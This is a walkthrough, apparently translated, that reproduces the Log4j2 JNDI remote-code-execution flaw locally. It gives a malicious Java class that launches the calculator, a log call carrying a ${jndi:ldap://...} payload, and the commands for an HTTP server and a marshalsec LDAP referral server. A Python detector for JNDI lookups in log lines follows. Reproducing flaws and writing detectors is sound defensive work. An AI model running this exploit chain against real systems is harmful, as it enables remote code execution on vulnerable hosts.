Log4j2 RCE: local reproduction on Windows

Note: first confirm whether the JDK you are using allows this JNDI lookup by default.

The vulnerability was disclosed only recently and its impact is enormous; while I am busy checking the company's assets for it, I am also doing a simple reproduction here.

1. Create a malicious class; here, one that pops up the calculator

    public class Exploit {
        // The constructor runs as soon as the class is instantiated
        public Exploit() {
            try {
                // Command to execute
                String[] commands = {"calc.exe"};
                Process pc = Runtime.getRuntime().exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        public static void main(String[] argv) {
            Exploit e = new Exploit();
        }
    }

Malicious class for macOS

    public class Exploit {
        public Exploit() {
            try {
                // Command to execute
                String[] commands = {"open", "/System/Applications/Calculator.app"};
                Process pc = Runtime.getRuntime().exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        public static void main(String[] argv) {
            Exploit e = new Exploit();
        }
    }

2. Compile it to a .class file, then run it

    java Exploit


3. Create a class that logs through log4j

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class log4j {
        private static final Logger logger = LogManager.getLogger(log4j.class);

        public static void main(String[] args) {
            // The logged string is parsed as a lookup and triggers a JNDI request
            logger.error("${jndi:ldap://127.0.0.1:1389/a}");
        }
    }

4. Try to run it, but it errors out


5. Start an HTTP server in the directory containing Exploit.class

    python37 -m http.server 8888

6. Open another shell and start an LDAP server

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"


7. Run the project again

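The lookup string logged in step 3 is exactly what a defender should be searching application logs for. The following is an added detection example, not code from the original post: it scans constructed sample log lines for `${jndi:...}` lookups and reports the scheme, host and port of each one (the `SAMPLE_LOG` lines are made up for the example).

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches a Log4j lookup of the form ${jndi:<scheme>://<host>[:port]<path>},
# the shape used in the log4j class above; scheme, host and port are captured.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    raw: str


def find_jndi_lookups(lines: List[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup string found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            port = int(m["port"]) if m["port"] else None
            findings.append(Finding(n, m["scheme"].lower(), m["host"], port, m.group(0)))
    return findings


# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '2021-12-10 12:00:01 INFO  [http-nio-8080] GET /index.html ua="Mozilla/5.0"',
    '2021-12-10 12:00:02 ERROR [main] ${jndi:ldap://127.0.0.1:1389/a}',
    '2021-12-10 12:00:03 INFO  [http-nio-8080] GET /login ua="${jndi:rmi://attacker.example/x}"',
    '2021-12-10 12:00:04 INFO  price is ${100} for item ${item}',
]

if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} lookup to {f.host}:{f.port} ({f.raw})")
```

This catches the literal form shown in this write-up; it is a triage aid for hunting in existing logs, not a replacement for upgrading log4j.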